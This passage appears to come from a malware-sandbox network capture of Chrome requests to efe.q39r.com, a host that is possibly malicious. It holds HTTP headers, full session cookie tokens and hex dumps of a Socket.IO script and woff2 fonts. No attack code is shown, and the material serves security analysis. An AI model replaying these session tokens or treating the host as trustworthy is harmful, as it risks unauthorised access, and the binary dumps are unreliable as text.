                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:23:33 UTC702INHTTP/1.1 200 OK
                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                  Content-Length: 45806
                                                                                  Connection: close
                                                                                  Accept-Ranges: bytes
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Cache-Control: public, max-age=31536000, immutable
                                                                                  Content-Disposition: inline; filename="socket.io.min.js"
                                                                                  Date: Tue, 16 Apr 2024 19:40:08 GMT
                                                                                  ETag: "80f5b8c6a9eeac15de93e5a112036a06"
                                                                                  Server: Vercel
                                                                                  Strict-Transport-Security: max-age=63072000
                                                                                  X-Vercel-Cache: HIT
                                                                                  X-Vercel-Id: iad1::wnxjz-1713296408969-670e28de6495
                                                                                  X-Cache: Hit from cloudfront
                                                                                  Via: 1.1 32d89cd7b31f0d3b7d2c8ad0a76aadee.cloudfront.net (CloudFront)
                                                                                  X-Amz-Cf-Pop: ATL58-P3
                                                                                  X-Amz-Cf-Id: qveRRHnz52Vy5iB9Aj00gaF0R1E3Pgq3KneVFk_KnRUawzREuiGt9w==
                                                                                  Age: 1378247
                                                                                  2024-04-25 16:23:33 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 36 2e 30 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 33 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                                                  Data Ascii: /*! * Socket.IO v4.6.0 * (c) 2014-2023 Guillermo Rauch * Released under the MIT License. */!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof g
                                                                                  2024-04-25 16:23:33 UTC16384INData Raw: 6c 65 3d 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 2c 69 3d 6e 3d 3d 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 45 28 72 2c 65 2e 73 75 70 70 6f 72 74 73 42 69 6e 61 72 79 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 65 2e 77 73 2e 73 65 6e 64 28 74 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 26 26 69 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 77 72 69 74 61 62 6c 65 3d 21 30 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 64 72 61 69 6e 22 29 7d 29 2c 65 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 29 7d 29 29 7d 2c 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 28 72 29 7d 7d 2c 7b 6b 65 79 3a 22 64 6f 43 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f
                                                                                  Data Ascii: le=!1;for(var n=function(n){var r=t[n],i=n===t.length-1;E(r,e.supportsBinary,(function(t){try{e.ws.send(t)}catch(t){}i&&it((function(){e.writable=!0,e.emitReserved("drain")}),e.setTimeoutFn)}))},r=0;r<t.length;r++)n(r)}},{key:"doClose",value:function(){vo
                                                                                  2024-04-25 16:23:33 UTC13038INData Raw: 73 68 69 66 74 28 74 29 2c 74 68 69 73 2e 5f 6f 70 74 73 2e 72 65 74 72 69 65 73 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 66 72 6f 6d 51 75 65 75 65 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 76 6f 6c 61 74 69 6c 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 61 64 64 54 6f 51 75 65 75 65 28 6e 29 2c 74 68 69 73 3b 76 61 72 20 69 3d 7b 74 79 70 65 3a 45 74 2e 45 56 45 4e 54 2c 64 61 74 61 3a 6e 2c 6f 70 74 69 6f 6e 73 3a 7b 7d 7d 3b 69 66 28 69 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 72 65 73 73 3d 21 31 21 3d 3d 74 68 69 73 2e 66 6c 61 67 73 2e 63 6f 6d 70 72 65 73 73 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 69 64 73 2b 2b 2c 73 3d 6e 2e 70 6f 70 28 29 3b 74 68
                                                                                  Data Ascii: shift(t),this._opts.retries&&!this.flags.fromQueue&&!this.flags.volatile)return this._addToQueue(n),this;var i={type:Et.EVENT,data:n,options:{}};if(i.options.compress=!1!==this.flags.compress,"function"==typeof n[n.length-1]){var o=this.ids++,s=n.pop();th


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  39192.168.2.1749753172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:33 UTC1428OUTGET /90XMoG7YJNQ48AE7R9RefBV2W3ZP0TRtab71 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Origin: https://efe.q39r.com
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: font
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:34 UTC635INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:34 GMT
                                                                                  Content-Type: font/woff2
                                                                                  Content-Length: 43596
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="90XMoG7YJNQ48AE7R9RefBV2W3ZP0TRtab71"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d4%2F5dSVCEvIJbva07pwwXehmlWY17HJGo7XGnwemVBj0nxLx4vj69CuEHvejxyHjtG4Q11z6Y4Hea9CAfY%2F5KgcIIV4555DQ7t%2BruJIJ1%2BB5TwIinYwfS5C5%2FTRihg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fada509366766-ATL
                                                                                  2024-04-25 16:23:34 UTC734INData Raw: 77 4f 46 32 00 01 00 00 00 00 aa 4c 00 13 00 00 00 01 cf 50 00 00 a9 d5 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 55 1b 82 e4 7a 1c 8b 04 3f 48 56 41 52 8a 3b 3f 4d 56 41 52 46 06 60 3f 53 54 41 54 1c 00 8e 48 2f 4c 11 08 0a 81 c2 40 81 a5 50 0b 87 3e 00 30 82 8e 00 01 36 02 24 03 8e 78 04 20 05 8d 2e 07 97 7b 5b d6 bb 71 05 b3 c3 e4 8f 52 6c ba 0d 01 b0 74 fa f4 7e 76 f7 0b e8 b1 ed 28 e5 b6 c1 e8 b6 d0 54 c3 74 05 3b f6 14 6e 27 b0 dd 76 3d cc fe ff ff 3f 7f 99 88 6c 5d 02 78 49 92 b5 85 6d 1d 22 a8 ea 3f 68 4e 58 04 2c 02 96 b5 38 1a 3b 47 b4 d6 af cb 6d 2c 7d c1 68 d7 aa 3e 28 3d 5b ac 96 88 6d 2f d4 3e 9b b8 a1 ef 38 26 66 c1 e0 26 9d 06 1b b8 9b ad 91 5d a1 75 95 dd e0 26 9c 56 44 8f e5 5d ec 3c 8d 04 79 52 93 65
                                                                                  Data Ascii: wOF2LPUz?HVAR;?MVARF`?STATH/L@P>06$x .{[qRlt~v(Tt;n'v=?l]xIm"?hNX,8;Gm,}h>(=[m/>8&f&]u&VD]<yRe
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 5e e9 ec bf 1e 69 44 96 e1 11 7d 20 8c 8e 20 be ec 62 a6 ec fc 7d 44 49 76 75 d1 71 04 88 0f d8 6b cb 96 34 d2 0c f7 cc 14 40 c0 10 ce d5 ff 50 2a b0 b0 6a dc ed 89 29 f7 ec 94 27 df 4c 97 eb 89 c9 c2 ae b3 dc b1 62 e0 85 52 51 6a 49 2a 49 9b b4 51 6b da 54 ae 6c fa 5f 77 4f 0f d0 92 24 cb 1f e8 08 21 63 cc 2e 25 cb 7b 80 95 5f 4e 90 02 45 40 fc 00 0d 92 41 b0 da 9d f9 3f 9c ee 9a d9 61 57 0b 79 99 67 66 9d 67 1b 26 45 bc 0c f7 20 7e 88 78 f0 62 c5 cc 83 05 b5 62 c1 82 85 7e f8 a7 d6 f4 ef 1e 66 2f 80 a8 0a 1e d0 47 8a 82 b3 9d 4a 1b 36 b2 79 fe b3 df fa 0e 7a 45 40 54 9c 61 aa 30 5e 55 6c f6 df cf 06 00 fc 53 3a c3 bf 92 2c 03 9e 7d 04 1b 42 ec 52 a7 a8 52 74 7e b7 76 d1 85 00 ba 4c 3a 60 34 c1 49 4b 41 1c e6 bd a7 56 a3 ca b1 b7 78 26 40 a1 1f 8f 68 a8
                                                                                  Data Ascii: ^iD} b}DIvuqk4@P*j)'LbRQjI*IQkTl_wO$!c.%{_NE@A?aWygfg&E ~xbb~f/GJ6yzE@Ta0^UlS:,}BRRt~vL:`4IKAVx&@h
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: b1 ee b6 3e d8 2e 6d d7 b6 39 fb 46 fb 99 7d 9e 5d 57 72 91 73 73 4b bc 1c 72 12 ba 1e 36 36 7c 33 22 22 2a 2a 26 26 21 c1 e1 10 c5 bc bc 32 65 90 3a 76 de b1 83 76 d7 75 c7 d1 ff bd fa ef 37 7f f3 ee 97 3e fc ec d3 2f 3e 0d 7f 59 f7 9d e0 41 40 40 00 c8 82 05 10 40 c9 06 6a 8b 76 3f a2 63 04 fc cf bf 1a e0 05 82 e1 03 a0 ae 09 a0 0b f4 c0 a3 aa 1c 80 71 5b ad cd 01 38 80 ba 26 50 ed 76 16 e9 84 82 9d 77 d3 ef ac 8c 5b 06 e0 52 8b 81 00 1e 2c a6 f3 af 20 bc 4c 15 e0 d4 43 23 d6 51 35 b8 91 3c 4e 8d af 4d f0 9a f0 ff 89 98 49 1e c3 96 a1 ef 1e ef ae 41 39 d4 0e be a1 72 98 1c b4 98 29 ef a4 9e 40 7d 80 28 93 fa a9 ef 70 df d3 54 b5 e2 d5 ba 81 b2 f7 81 f6 10 fa 79 c4 7a c4 26 c4 11 70 a2 46 71 8f 62 7e 37 d0 ca bd 8a d4 e0 c1 fc fb 48 b3 d9 1f 86 2f e5 9b
                                                                                  Data Ascii: >.m9F}]WrssKr66|3""**&&!2e:vvu7>/>YA@@@jv?cq[8&Pvw[R, LC#Q5<NMIA9r)@}(pTyz&pFqb~7H/
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 3f 2a 25 ab 11 e4 13 01 e9 44 ae 3d cb 5b 69 7e db 22 51 70 ef 63 32 39 e9 64 71 a7 b5 30 b6 01 15 1a 29 e2 db ce 53 01 4b 24 89 db 11 9c 91 10 7d 9c ef d5 0f e1 38 11 2a 9e 08 b1 c6 95 68 36 08 c4 a8 a2 b4 98 b5 21 8e 45 d0 71 24 18 a7 83 42 25 37 a3 0f 52 82 02 89 71 3b a6 33 e3 76 a8 96 c5 96 00 31 78 04 a8 30 14 19 d5 19 35 da 35 a1 cc 49 64 7a 77 af a4 2d 6a 48 d5 f9 10 15 85 2c 13 a3 9e f6 44 fc 18 de 56 cd 85 7c a5 47 ac 97 c9 a3 b9 57 e1 c4 0a 96 52 70 14 1b 9d cf 6b 27 9f a5 fa bd 08 79 02 2c 96 02 20 16 9d 4d 88 68 fb d6 4a 21 21 6d b6 8c 58 80 8a 4a bd a3 a3 79 25 a6 aa 2e 1a 3d c6 77 60 74 91 90 6a 2a 81 e2 98 32 ad 42 a4 cf 75 c9 16 1c 25 3d 79 6f 32 9f 8e cf 45 7e e6 05 e8 4e 24 f2 4f 2c 8e ab 2d 9c 9c 76 49 bb eb d8 5e de eb 78 af d8 0e f9
                                                                                  Data Ascii: ?*%D=[i~"Qpc29dq0)SK$}8*h6!Eq$B%7Rq;3v1x055Idzw-jH,DV|GWRpk'y, MhJ!!mXJy%.=w`tj*2Bu%=yo2E~N$O,-vI^x
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 49 d3 5e 26 60 bf a5 86 5b 4a 69 0c d1 e1 b8 20 fc 23 8b 97 28 3f 36 3d bc 0d d8 3d 52 72 fe 9d 98 df f6 99 86 c4 bc 22 f8 09 5a 28 e5 b7 77 89 61 b7 36 f9 53 75 68 4b 1e a3 d9 26 75 d4 2c cc 9b ab c9 a0 c4 be a0 65 70 6a fc 71 23 f4 aa f8 fc 97 90 31 c6 86 3b 8d 2e bf 22 ac c8 63 a8 a4 64 cd 76 00 e5 20 65 ff cf 30 3f a6 13 d2 e5 62 0b a4 27 2d 7d 39 cc f0 e0 9e 1d af b5 ec 6f 86 84 31 96 bb 8e 91 1f de f5 79 ed 91 b4 46 3e b6 fa d8 67 65 be e3 e4 c7 96 8c a1 bb 91 79 70 21 64 5b 43 4a bb 5f ce 7f 6a 9e e2 6c 74 bd 98 84 44 03 65 56 43 e1 02 9a f1 01 c9 b2 0e 5a 9a 74 1e 19 d7 2d 04 6b 89 4f 3e 7f eb 62 e6 73 66 69 2d cd a3 e6 3f 27 75 aa 1d f4 11 10 73 fc 42 d2 5a c5 86 43 23 db 5e 68 e7 7a 4b d7 dd 63 72 dd 6d 59 de 57 ba ed 90 63 7c a6 8b 45 e2 fa ee
                                                                                  Data Ascii: I^&`[Ji #(?6==Rr"Z(wa6SuhK&u,epjq#1;."cdv e0?b'-}9o1yF>geyp!d[CJ_jltDeVCZt-kO>bsfi-?'usBZC#^hzKcrmYWc|E
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: c8 6b a3 ce 59 5f c3 25 0b 9d f2 4a e9 03 fe a9 a9 bb 81 48 18 fa 58 6c d7 68 8e c9 73 ff 93 f3 ea 71 72 7c d4 67 35 e2 25 58 ad 9b 53 bb 0e 1a 84 1a b8 82 5e 74 f8 f1 ff 58 67 54 9d 62 90 e9 68 f1 c4 58 64 f4 a7 11 7b 4a 5a 49 91 3e 4e c4 a0 f3 c2 16 05 ca 58 f5 2f 67 94 92 df bd d2 cb da 8d 4e 2f c9 b6 83 3e 5b 35 3d f8 fc e3 65 9c 37 d6 d2 a2 c6 49 f6 ae d8 e1 89 37 ae 63 7d 3f 6f 70 d7 3f 3b 22 5b 75 e5 01 5e 3b bd 02 7a e2 ad bd 31 24 3b ab 34 eb 3d 4b b2 d1 8a eb d4 09 e1 09 bc 2e 7f c6 88 31 51 e6 fa 1c 6a c5 06 7d 66 4a f0 e0 eb c6 48 eb a6 3e de c9 7a 7d 78 4b d7 98 bd e2 c3 08 cd f3 88 6d ff fa 2e f6 41 89 df d6 d2 4a ff 7b f6 01 aa 12 65 af e8 2b 9c 2a 6b b9 21 bb 8c e8 e3 a7 1f ef 6f bf d7 f8 0b 47 b0 c3 71 a6 2e 6c 7f 81 ee 98 c2 d1 a6 7a dd
                                                                                  Data Ascii: kY_%JHXlhsqr|g5%XS^tXgTbhXd{JZI>NX/gN/>[5=e7I7c}?op?;"[u^;z1$;4=K.1Qj}fJH>z}xKm.AJ{e+*k!oGq.lz
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 30 8f 71 e0 45 cd 17 36 9d d7 1b 32 2a 11 0d 58 a9 2e 71 1b 1f 61 c5 f5 94 ef d3 73 ea 88 7e fb b9 e6 e1 b6 70 c5 34 0a fa 3b 86 fc cc ba 3c 05 7c 34 ea 88 f5 a3 a2 c0 20 35 13 6c 15 e6 41 b8 3e b6 11 22 ac 69 58 6e 3e 6f 9f 28 7b a8 5f 8d bd 76 d8 eb 29 93 79 48 c9 a3 99 6f 6d 06 7f 5d 9e f1 6c 7c 55 3b 55 c9 af 3f cf 18 45 2c 1f 72 44 e3 8e 81 85 63 86 d5 6b ad b7 62 ee 7b 30 a5 df b6 73 24 1a c7 c1 b3 0d fe d9 73 ef 8f c3 b0 9d 51 f5 d7 70 ba 54 f4 24 dd 1a 73 5e 9d 9c 39 5d 1e 8c 82 fe 2c 1f ac a6 0c ba fc c5 27 14 94 19 0f 5f 43 a0 42 02 67 1f be 85 af e9 f8 fc a5 c4 0d b4 f6 ff a2 a2 95 1c ec dd 96 1c e3 1d 16 52 27 61 e2 78 29 ad 1d 7e c2 7e d3 02 91 a1 b6 1e d4 a0 32 62 5d 05 eb 60 2f a3 ce 28 2a e3 76 d1 e6 94 8a 9e 84 ca d4 81 95 59 f2 d3 14 a9
                                                                                  Data Ascii: 0qE62*X.qas~p4;<|4 5lA>"iXn>o({_v)yHom]l|U;U?E,rDckb{0s$sQpT$s^9],'_CBgR'ax)~~2b]`/(*vY
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: f8 8c 32 f2 52 b9 28 d4 a6 32 9a 40 88 66 46 b8 5f 12 ff ff f1 87 04 f0 10 a2 2a 99 3a 19 38 85 1e 76 b6 ca 97 a4 50 a1 74 c5 4a 64 28 d7 28 4b 8b 76 a5 ba f4 a8 34 64 58 ad 57 5e a9 37 61 5a 83 05 0b b0 56 ec 6a b1 ef 8d 6e 47 be ea 77 69 c1 73 7e 5b 36 e1 26 c8 81 08 6c e7 58 14 76 72 2e 2a 52 87 d1 0a 77 14 a7 68 9f bb 2f d5 97 1e 6b e9 a2 36 6d fd ae 5d 6f 7f 1a b0 82 9f bb 29 b7 d4 fd 91 ac f6 10 55 d6 d9 81 2f c0 08 b1 30 af 61 14 e9 1d cc 52 bc 9b 4d aa f7 6a 94 66 cc 30 31 cf 58 e7 eb 7d 07 9e e7 07 f4 ff dd 72 11 79 f7 17 5f 34 4c 30 6f 52 00 13 2c 5d 6a a1 96 01 ec 65 65 8c c9 a0 60 fb 80 e3 33 a2 57 29 00 94 cf 1c 2c af 0c ea d6 9e 38 04 86 2f cf 6a 38 67 ad fd e2 eb f5 49 f1 24 1f c0 fb 3c e2 91 ad 41 0a dd d8 dc da de ed 78 67 77 6f ff 60 6d
                                                                                  Data Ascii: 2R(2@fF_*:8vPtJd((Kv4dXW^7aZVjnGwis~[6&lXvr.*Rwh/k6m]o)U/0aRMjf01X}ry_4L0oR,]jee`3W),8/j8gI$<Axgwo`m
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 2c 41 21 b6 b0 88 47 91 d7 a4 a8 59 49 85 cd e8 3b 74 ea d2 ad 47 af 01 83 2a 50 d0 30 b0 86 e7 e1 2b 22 33 b7 92 8a 9a 86 56 b1 9b 6b ab d7 c0 f1 42 d4 c9 4c 7c 57 eb 35 6a d6 a2 4d 87 17 ba 74 eb d5 6f f0 25 a9 7f fd e7 cc 5b b0 68 c9 b2 15 ab d6 ac db b4 65 db 8e 5d 7b f6 1f 5c 46 ee 05 c1 f8 3a a8 e2 f4 ae 1d 96 85 be 31 95 e5 ba 29 b3 5a 43 66 ac 5d ff 03 0f b1 75 01 fc b2 4f 81 3a f6 64 4f 47 bb 09 e2 3c 29 42 ad e2 3e 22 4d c4 96 88 6b 74 7e fd 64 e0 75 81 12 2b 3a af dd 10 60 9b 79 6f a0 89 16 44 eb 3a 5f 22 ef c0 43 4c be cd 4a 39 0e c7 e5 59 da 0b 4e c2 cb e5 0c c1 50 23 94 b7 f3 4e de 25 4a c6 14 ad b2 60 08 6e 56 39 dc aa d3 6a 2d 0f 41 b9 5a df dc ee da de da be da fe 15 9d 13 bc 46 63 60 98 0d 8b 15 9c 87 cd 92 34 67 eb 36 27 78 65 b2 4c 56
                                                                                  Data Ascii: ,A!GYI;tG*P0+"3VkBL|W5jMto%[he]{\F:1)ZCf]uO:dOG<)B>"Mkt~du+:`yoD:_"CLJ9YNP#N%J`nV9j-AZFc`4g6'xeLV
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 2b 00 1c 18 0f 5d 54 95 c8 98 28 93 32 63 a4 7d 4c 7f a8 5d 3c fc e6 0b 52 65 a8 96 ad 58 0e 9c 5d eb b6 6c 47 61 61 c3 76 2e 25 66 40 87 ee 2b 77 72 0b b9 36 71 8f ab 5f 1d 5b f5 cc bb 91 f0 45 30 3e 81 94 2f a3 d2 8e 56 37 3a 3d a8 75 61 30 8d d1 0c 4e 07 58 6c 60 b7 83 db 11 56 9b 78 3d f6 4d 93 ef f2 ae 35 07 29 06 c0 76 69 21 92 12 8b a1 27 35 49 2b 44 12 93 cf 48 71 b0 40 ca 43 53 1d 9e ca b0 90 23 52 1b 9b e6 94 b4 a7 a7 35 4d 21 2e 87 4c c3 aa 9a 97 c9 d2 f4 17 66 95 1f bf 28 5e 61 c2 ca 24 35 89 ab 13 55 a5 5c 9f 62 5d f2 f6 6c 6f 17 b8 23 ef de 82 df 2a 60 7b 41 6f 16 f1 7e 31 ad 15 2b a1 9d 92 db 2f b1 dd 08 f8 24 f1 58 b6 cd cf a7 2f 72 be 06 8f cf 43 45 27 ad 4d b5 a1 b3 3a 34 5b ca 51 91 0f 59 c2 86 19 45 7e 58 f8 7b 3d fb a0 a4 f6 ba ef b4
                                                                                  Data Ascii: +]T(2c}L]<ReX]lGaav.%f@+wr6q_[E0>/V7:=ua0NXl`Vx=M5)vi!'5I+DHq@CS#R5M!.Lf(^a$5U\b]lo#*`{Ao~1+/$X/rCE'M:4[QYE~X{=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  40192.168.2.1749754172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:33 UTC1428OUTGET /efIbTPq3F3E9M4tIsfj78N3gmAo2XLQkl100 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Origin: https://efe.q39r.com
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: font
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:34 UTC633INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:34 GMT
                                                                                  Content-Type: font/woff2
                                                                                  Content-Length: 93276
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="efIbTPq3F3E9M4tIsfj78N3gmAo2XLQkl100"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SI9sTBcI9zqPHSo4tx10CPhZiQVE0G%2BsQzx6E2%2B5iD3GvfenQol5ECbIxSdokpQMZJnQ2nOQN8jrHZ8TWM1LjpnngvZJjc%2F4GRMNnIxuL9awP5PFEyeTqzCV6%2FoV5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fada51ab212e1-ATL
                                                                                  2024-04-25 16:23:34 UTC736INData Raw: 77 4f 46 32 00 01 00 00 00 01 6c 5c 00 14 00 00 00 04 b2 20 00 01 6b e0 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a a4 76 1b 83 bb 26 1c 93 24 3f 48 56 41 52 a0 6a 3f 4d 56 41 52 81 46 06 60 3f 53 54 41 54 81 36 27 38 00 91 18 2f 81 48 11 08 0a 81 f8 0c 81 d3 78 0b 89 1a 00 30 8b e7 3a 01 36 02 24 03 92 30 04 20 05 97 7a 07 a2 17 5b 12 9a 94 07 25 22 db df 13 ba a5 ab c1 a5 a2 a8 fe 21 df bb 49 da 54 19 b0 7f a9 77 90 21 63 9b 48 1d ce cd 74 1d 5d 6b a5 08 9e a7 0f c8 36 9d f1 82 43 79 c3 a8 7f 55 6c b7 72 65 ff ff ff ff ff ff 9b 92 49 8c e9 25 e8 25 f9 7f 00 15 44 45 b1 a0 ba ce 76 d3 69 ae 51 46 38 dc dd 84 83 d2 69 48 19 21 72 0a ca e2 f4 da d1 50 34 5a 5b b9 db ae 1d f6 5a 73 10 9e 89 b6 6f 06 0e 72 ef e2 38 62 1c 4f e8
                                                                                  Data Ascii: wOF2l\ kv&$?HVARj?MVARF`?STAT6'8/Hx0:6$0 z[%"!ITw!cHt]k6CyUlreI%%DEviQF8iH!rP4Z[Zsor8bO
